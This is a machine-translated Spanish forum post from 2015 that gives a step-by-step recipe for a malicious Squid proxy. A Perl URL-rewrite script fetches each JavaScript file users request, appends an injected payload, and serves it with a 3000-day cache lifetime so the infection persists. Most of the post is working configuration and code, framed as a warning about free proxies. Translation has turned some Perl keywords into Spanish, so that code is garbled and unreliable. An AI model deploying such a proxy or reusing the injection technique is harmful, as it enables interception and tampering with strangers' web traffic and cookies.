Este artículo es un artículo espejo de traducción automática, por favor haga clic aquí para saltar al artículo original.

Vista: 14819|Respuesta: 3

[Comunicación segura] Utilizar servidores proxy para secuestrar los datos privados de los usuarios

[Copiar enlace]
Publicado en 19/1/2015 2:34:56 | | | |
Esta publicación fue editada por última vez por Mo Xiaowen el 7-6-2015 a las 23:19


Esto se puede hacer simplemente modificando la configuración de SQUID
¿Qué es el CALAMAR?
Squid es un software que almacena en caché datos de Internet, recibe solicitudes de descarga de los usuarios y procesa automáticamente los datos descargados. Cuando un usuario quiere descargar una página principal, puede enviar una solicitud a Calamar, pedirle que la descargue en su nombre, luego Calamar se conecta a la web y solicita la página principal, y después envía la página principal al usuario manteniendo una copia de seguridad; cuando otros usuarios solicitan la misma página, Calamar envía inmediatamente la copia de seguridad guardada al usuario, para que el usuario sienta que la velocidad es bastante rápida. Squid puede proxy protocolos como HTTP, FTP, GOPHER, SSL y WAIS, y Squid puede gestionarlo automáticamente, y puedes configurar Squid según tus necesidades para filtrar cosas no deseadas.
Squid puede funcionar en muchos sistemas operativos, como AIX, Digital, UNIX, FreeBSD, HP-UX, Irix, Linux, NetBSD, Nextstep, SCO, Solaris, OS/2, etc.
La implementación es muy sencilla:
1. Instalar Squid en un servidor Linux.
2. Modificar el código del servidor, insertar una parte de nuestro código en todo el javascrip transmitido y enviarlo.
3. Poner el tiempo de caché de nuestro archivo js modificado lo más alto posible.
Este método también se aplica a sitios web con SSL activado; si el sitio carga un recurso inseguro (como jquery para un sitio HTTP), la mayoría de los navegadores emitirán una advertencia, pero pocas personas prestan atención.
Chema dijo que más de 5.000 personas usaron su proxy pocos días después de que lo lanzara, y la mayoría lo usó para hacer cosas malas, porque usaron el proxy, así que pensaron que era anónimo y seguro, pero nunca esperaron que el servidor proxy también hiciera cosas malas.
Crea tu servidor proxy malicioso
Si ya tienes un servidor proxy de Squid, también necesitarás un servidor web como Apache.
Paso 1 Crear una carga útil
Utilizo un script sencillo como demostración para apuntar todos los hipervínculos a mi sitio web.
/etc/squid/payload.js

[mw_shl_code=javascrip remove t, true]for(var i=0; i<document.getelementsbytagname('a').length; i++)
document.getElementsByTagName('a').href = "https://blog.haschek.at"; [/mw_shl_code]
Paso 2 Escribe un script para infectar todos los archivos JS
/etc/squid/poison.pl
[mw_shl_code=perl,true]
#!/usr/bin/perl
$|=1;
$count = 0;
$pid = $$;
mientras(<>)
{
  mordisco $_;
  if($_ =- /(.*.js)/i)
  {
        $url = $1;
        system("/usr/bin/wget","-q","-O","/var/www/tmp/$pid-$count.js","$url");
        sistema("chmod o+r /var/www/tmp/$pid-$count.js");
        sistema("cat /etc/squid/payload.js >> /var/www/tmp/$pid-$count.js");
        imprimir "http://127.0.0.1:80/tmp/$pid-$count.js";
  }
  si no,
  {
        imprime "$_";
  }
$count++;
}[/mw_shl_code]
Este script usa wget para obtener el javascrip original de la página y eliminar el archivo t, luego añadir el código en /etc/squid/payload.js y enviar el archivo modificado al cliente, mientras que necesitas crear el directorio /var/www/tmp y permitir que squid escriba archivos en él. Este directorio almacena los archivos js modificados.


Paso 3 Combina el guion anterior con Calamar
Añádelo en /etc/squid/squid.conf
[mw_shl_code=html,true]url_rewrite_program /etc/squid/poison.pl[/mw_shl_code]
Paso 4 Haz que la caché nunca falle
/var/www/tmp/.htaccess
[mw_shl_code=html,true] Caduca Activo en
CaducidadPor defecto "acceso más 3000 días"[/mw_shl_code]
Esto le indicará a Apache que le dé un largo tiempo de caducidad hasta que el usuario limpie su caché.


Si conectas este proxy, al hacer clic en cualquier hipervínculo te redirigirás a mi web, y la caché seguirá existiendo aunque no uses el proxy más adelante. Yo solo usé una carga útil no agresiva, y con este método, los hackers pueden hacer mucho más. Así que recuerda a ti y a tus amigos tener cuidado al usar proxies gratuitos.





Anterior:Miles de materiales transparentes a FLASH
Próximo:Máquinas Android transitorias de iPhone y iPad en minutos (súper fácil)
Publicado en 19/1/2015 8:48:45 |
Sí, todos los datos de acceso pueden ser interceptados por el servidor proxy, incluidas las publicaciones posteriores a la compra, así que ¿cómo se puede declarar la privacidad?
Publicado en 19/1/2015 9:53:53 |
¿Pueden interceptar mis cookies?
 Propietario| Publicado en 20/1/2015 14:36:06 |

Sí                                             
Renuncia:
Todo el software, materiales de programación o artículos publicados por Code Farmer Network son únicamente para fines de aprendizaje e investigación; El contenido anterior no se utilizará con fines comerciales o ilegales; de lo contrario, los usuarios asumirán todas las consecuencias. La información de este sitio proviene de Internet, y las disputas de derechos de autor no tienen nada que ver con este sitio. Debes eliminar completamente el contenido anterior de tu ordenador en un plazo de 24 horas desde la descarga. Si te gusta el programa, por favor apoya el software genuino, compra el registro y obtén mejores servicios genuinos. Si hay alguna infracción, por favor contáctanos por correo electrónico.

Mail To:help@itsvse.com